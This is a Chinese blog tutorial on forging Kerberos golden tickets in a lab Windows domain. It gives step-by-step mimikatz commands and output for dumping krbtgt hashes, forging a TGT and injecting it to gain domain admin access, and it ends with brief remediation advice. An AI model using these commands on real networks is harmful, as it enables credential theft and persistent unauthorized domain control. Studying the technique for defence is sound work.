域後續之golden ticket

原創 z2pp 2018-09-11 09:25

0x00 前言

當域***成功後,域控制器已被攻陷,這時***者通常需要維持域中權限,持久控制域控制器。本文中提到的golden ticket(黃金票據)主要是利用微軟Kerberos協議缺陷和域中krbtgt賬號的信息,可生成任意TGT,該TGT可用於當前域中Kerberos認證的任何服務。***者只需要保存krbtgt賬號中的信息生成golden ticket注入內存當中,即可擁有權限,且該票據的有效期是十年。

0x01 準備工作

  1. 域控制器一臺及管理員權限(dc都沒攻陷,談何後續?)
  2. mimikatz

0x02 模擬環境

域控制器 2008r2 dc.test.com 192.168.3.100
域內機器 2008r2 client.test.com 192.168.3.10
域外機器 win7 xxxxxx.xxx 192.168.3.18

0x03 漏洞自檢

只能去翻看日誌咯~~~~

0x04 漏洞利用

1. 獲取krbtgt賬號信息

包括Server SID、NTLM或aes256或aes128,在域控制器上使用mimikatz操作

C:\Users\Administrator\Desktop>mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit"
mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::lsa /patch
Domain : TEST / S-1-5-21-1406004368-3818689962-3591297438
RID  : 000001f6 (502)
User : krbtgt
LM   : 
NTLM : 80c073620041d7cc60c36ea12bdecb5d
//只摘重點部分展示

抓取aes256,需要使用另外的命令,aes256和NTLM只需要一個即可

C:\Users\Administrator\Desktop>mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:test.com /user:krbtgt" "exit"
mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /domain:test.com /user:krbtgt
[DC] 'test.com' will be the domain
[DC] 'dc.test.com' will be the DC server
[DC] 'krbtgt' will be the user account
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : TEST.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 7a615ae0d4b62a304ab086749b87ec0933dccb62c15e9fc2ca176bd4cf5ee8c5
            aes128_hmac       (4096) : aeb64a10f1fa77b344fb873ba04fa755
      des_cbc_md5       (4096) : dcd9ec620b26f7df
      rc4_plain         (4096) : 80c073620041d7cc60c36ea12bdecb5d

2.生成golden ticket(其實也是TGT票據)

先使用NTLM來生成票據

C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:域名 /sid:SERVER SID /krbtgt:NTLM /ticket:test.kirbi" "exit"

執行後會在當前目錄生成票據,名爲test.kirbi
域後續之golden ticket
aes256生成票據

C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:域名 /sid:SERVER SID /aes256:值 /ticket:xxx.kirbi" "exit"

執行後會在當前目錄生成票據,名爲xxx.kirbi
aes128同256,將參數名修改和值即可/aes128:xxx

3.票據注入

分別使用兩臺機器進行測試,一臺爲域內成員機器,一臺爲域外成員機器,測試是否能通過票據使任意能聯通域的機器獲取到域管理權限!將票據保存到兩臺機器上

* 域內機器測試

域後續之golden ticket
!未注入票據前,域內機器不能直接訪問域控制器

mimikatz # kerberos::ptt aes256.kirbi  #xxx.kirbi爲文件名

域後續之golden ticket
!注入票據後,成功訪問域控制器

* 域外機器測試

需要注意的是,域外機器先得將dns指向域控制器或域內dns服務器,否則無法解析主機名
域後續之golden ticket
可以正常解析!
域後續之golden ticket
機器不在域中
!未注入票據前,域外機器不能直接訪問域控制器
域後續之golden ticket
!注入票據後,域外機器成功訪問域控制器
域後續之golden ticket

0x05 細節

  1. 訪問時,不能使用ip地址,必須使用域名
    域後續之golden ticket
  2. 如有錯誤,請斧正,謝謝!

0x06 修復

當域被***後,不止要重置域管理員密碼,還需要重置krbtgt賬戶密碼,且需要重置兩次,才能使golden ticket失效,否則擁有golden ticket的***者將可以隨便進出域中

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

其實那天,這個2B只是想安靜的喝一杯2B牌全麥醇香德國阿姆斯特丹啤酒……

五六毛 2019-02-24 14:23:20

誰的錯???

林海閒人 2019-02-24 14:16:17

好酒當飲醉,好文當日更

強哥_2018 2019-02-24 14:02:09

捕捉剎那的光華,靈魂永不斷片

強哥_2018 2019-02-24 14:02:09

發現生活之美

老李雜談 2019-02-24 13:53:14

怎麼就文化向文盲讓步了?

趙蓮貴 2019-02-24 13:52:30

吵架了

苦惱的蝸牛 2019-02-24 13:45:55

弟弟的傷

苦惱的蝸牛 2019-02-24 13:45:55

兩岸故宮一直在爭誰厲害,今北京故宮耀眼奪目將臺北故宮拋在身後

marsdaily 2019-02-24 13:31:31

伴隨着影視作品的推波助瀾,故宮開始成爲如今的超級大IP!

marsdaily 2019-02-24 13:31:31

Kick off

usdaydayup 2019-02-22 19:56:49

試試水

Edward__Li 2019-02-22 19:47:17

關於未來

巡洋艦cool 2019-02-22 17:08:03

荒誕玄妙科幻穿越雜文:暗器 Pirni Pro 的一次測試

enables 2019-02-22 16:29:12

領導說你要進步

野丸子 2019-02-22 14:09:51